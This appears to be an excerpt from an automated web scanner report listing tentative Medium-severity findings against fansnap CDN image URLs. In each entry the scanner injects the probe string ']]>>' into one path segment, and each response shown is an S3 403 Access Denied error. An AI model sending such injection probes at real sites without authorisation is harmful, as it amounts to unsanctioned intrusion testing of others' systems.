8.189. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3604CF1A9D03C6A8
x-amz-id-2: +jWDnAO18ZFtsIKZrduEQnZ/P4iG8bNceTX9euCf0WNyr9w+ns8uz4V9zmcyBifs
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:22 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f92cc838b293fde8bf4f9373215a654fc97039011c2f37de229b2102bff10b942e45bf19f2628e7c
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3604CF1A9D03C6A8</RequestId><HostId>+jWDnAO18ZFtsIKZrduEQnZ/P4iG8bNceTX9euCf0WNyr9w+ns
...[SNIP]...

8.190. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ffcc00-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 53B014E8A8A58624
x-amz-id-2: R9+N7YgHx9kSsD1cRNfYAFkp49V7RRqjteLOFyranPtaqJElMx1cCCrpKtlcEqIh
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2bb6560b6f01ea9e333467668c57f7b9ecf4e87d9426cdcbcdcb15517c9ff380b28e555cf62a50ad
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>53B014E8A8A58624</RequestId><HostId>R9+N7YgHx9kSsD1cRNfYAFkp49V7RRqjteLOFyranPtaqJElMx
...[SNIP]...

8.191. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ffcc00-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A846C283C0AA42E8
x-amz-id-2: CS7O1W+pwYWGe5D2Jjsd4e3E+67acQafxFoQcah8bGl/ynX7KSDGFU5HBnzC90lb
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9324c947c1392e2ab9fa576e4c59392f16c7fc4c9367431ec414c72b40a7ff36f4afe0f06ef61594
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A846C283C0AA42E8</RequestId><HostId>CS7O1W+pwYWGe5D2Jjsd4e3E+67acQafxFoQcah8bGl/ynX7KS
...[SNIP]...

8.192. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ffcc00-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AC420AA6DFBB991B
x-amz-id-2: kh8O3z9vQKNCQDUcdomTL5WR8Flvmw2Vnhg09QLwIAt1PrqPkf7KB3Zi0lasOCEA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:15 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 70a3e5d3cf2474c0253e0888553a080438b19589b25fae04b8fa2ef07170ee95e0ac052dcc0521a1
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AC420AA6DFBB991B</RequestId><HostId>kh8O3z9vQKNCQDUcdomTL5WR8Flvmw2Vnhg09QLwIAt1PrqPkf
...[SNIP]...

8.193. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D94C908C5BF08D99
x-amz-id-2: oj+v2W1SP9VbOZMM3LpTl43B8venpGXO6otpgtkY9Y//dyEzGZlCsjzdI4Z8vk4E
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:19 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5a7824efe1d24d19d5cb4be16869655839681744080ebcd4fbea886533c2fb15ddbf7d083df57ca0
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D94C908C5BF08D99</RequestId><HostId>oj+v2W1SP9VbOZMM3LpTl43B8venpGXO6otpgtkY9Y//dyEzGZ
...[SNIP]...

8.194. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ffcc00-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 801F152A128E184A
x-amz-id-2: jA3IGj/IZsxEgep4YGYQwb0B6Tk5DtwT+sBmD83m/wL816qjb0IXl/qVJDjFeoGC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:59 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1d88c0a1c9eb55e3a68967e84db831211de654e91bf043220721abe601ab6fdcbff64827e5074ba5
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>801F152A128E184A</RequestId><HostId>jA3IGj/IZsxEgep4YGYQwb0B6Tk5DtwT+sBmD83m/wL816qjb0
...[SNIP]...

8.195. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ffcc00-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BBDC441DB4F738F4
x-amz-id-2: dPlwAWdCoJsw8l3GYymnbxH8vkvnkwyDJxgRvFTjMsbVfOTsVTNG+NhVYpwTampl
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:11 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 850749d8e84f630eab8b2d236df0d867a3fc92df4a3e8a21f3c6ce9f4a1e90458838898f0bae2d4f
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BBDC441DB4F738F4</RequestId><HostId>dPlwAWdCoJsw8l3GYymnbxH8vkvnkwyDJxgRvFTjMsbVfOTsVT
...[SNIP]...

8.196. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ffcc00-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B175044940F91731
x-amz-id-2: eN2HN41dr1eNBESlZXC1lzafeaa7yo+O+4+cQHv1zZhFPjrBq5eSXUA1RWz9iRKt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:17 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 604efd9ebe16746d6c7b51412696f5bf242fe237f4b730576bed6fad4afbc4cd655fa581ae24f8c2
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B175044940F91731</RequestId><HostId>eN2HN41dr1eNBESlZXC1lzafeaa7yo+O+4+cQHv1zZhFPjrBq5
...[SNIP]...

8.197. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 383633FD94770639
x-amz-id-2: SEjkgS7ipwBVX0jJmGS3wtGAUM6WVuAfGB+VN4/KQ/VneUx2ELe/wxKPVKv/NBPK
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2194d0670f0789d1c1bce9e8f6344e97d9673975182558d3ec6f325efc6ac874afbf67bd414d31d1
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>383633FD94770639</RequestId><HostId>SEjkgS7ipwBVX0jJmGS3wtGAUM6WVuAfGB+VN4/KQ/VneUx2EL
...[SNIP]...

8.198. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/progressBar_all.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4952B8EED0870F8D
x-amz-id-2: XO63p3zx1mYl+5NgDDXDa5rWy0xqzK8PC3kcGJWrbGHCAEujrB2lTNSAXJWhwUM/
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3bb6a54b9d89a0b8b832648a2f656d4923df8abd98d1315b4c3efd42403b929634108ebda1984e15
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4952B8EED0870F8D</RequestId><HostId>XO63p3zx1mYl+5NgDDXDa5rWy0xqzK8PC3kcGJWrbGHCAEujrB
...[SNIP]...

8.199. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/progressBar_all.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5692307D67523023
x-amz-id-2: LspENAd9qFc3atxk7c/JuCxWKKL4zZQK+Pr0p83CdMQO/VB3mlbCMQ/EIaBpIuIr
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:46 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 299cd3b599c04abab9b26b2c421a08cbcb8f09e8ce87e87974e12978893da8b23129553604ebf8e3
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5692307D67523023</RequestId><HostId>LspENAd9qFc3atxk7c/JuCxWKKL4zZQK+Pr0p83CdMQO/VB3ml
...[SNIP]...

8.200. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/progressBar_all.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9731CD41F157965A
x-amz-id-2: Y92qeVuq+0f52f/sIrMnKj5p2mD0g1JCoRmVMkjP6u5oTl3zMNt5Dqxgw0Az97Jr
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: cb2c73809a55650113a01335776c3279ed625c413bdd8c3062aefd9e485a0aeae5a5607e78aebd28
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9731CD41F157965A</RequestId><HostId>Y92qeVuq+0f52f/sIrMnKj5p2mD0g1JCoRmVMkjP6u5oTl3zMN
...[SNIP]...

8.201. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BCE770010370D439
x-amz-id-2: yXLSy7a5egZ1oySscYmJgg78Wmmd4Qtl0TfLy9N3+yMTLq9H7azBDmIsJ8QWJ2nt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:43 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d35a394a96a9de16ef45f10e6c37357dfa18ba2ab455c9148457dd76d37fa86e85f44dcd1a428e94
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BCE770010370D439</RequestId><HostId>yXLSy7a5egZ1oySscYmJgg78Wmmd4Qtl0TfLy9N3+yMTLq9H7a
...[SNIP]...

8.202. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9424DDABF6B3EB85
x-amz-id-2: NekkuvI5cQBgIumpBRlKhph9W6DAmsb1MatESnfat55T00kL5hOTirUw3f4HUhyJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 362083ac4644e62d5b50c81337362c53a92fcdb5f2b8cfeb177e40ec8ca7e3a329c1df8463596c3b
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9424DDABF6B3EB85</RequestId><HostId>NekkuvI5cQBgIumpBRlKhph9W6DAmsb1MatESnfat55T00kL5h
...[SNIP]...

8.203. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AD5969C5272C5072
x-amz-id-2: /XbEdueLcFmUMMWYDUVVSHwRsSjxDxKKJJajeCWf6uAWF0VfJkLgI0fOTq1qy0RC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:48 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b1bd93a9b8e3282b68b5ec4fcda7c7e149f737f74b61290b46c3ad0dfb288f385cf8ace2fae45a4e
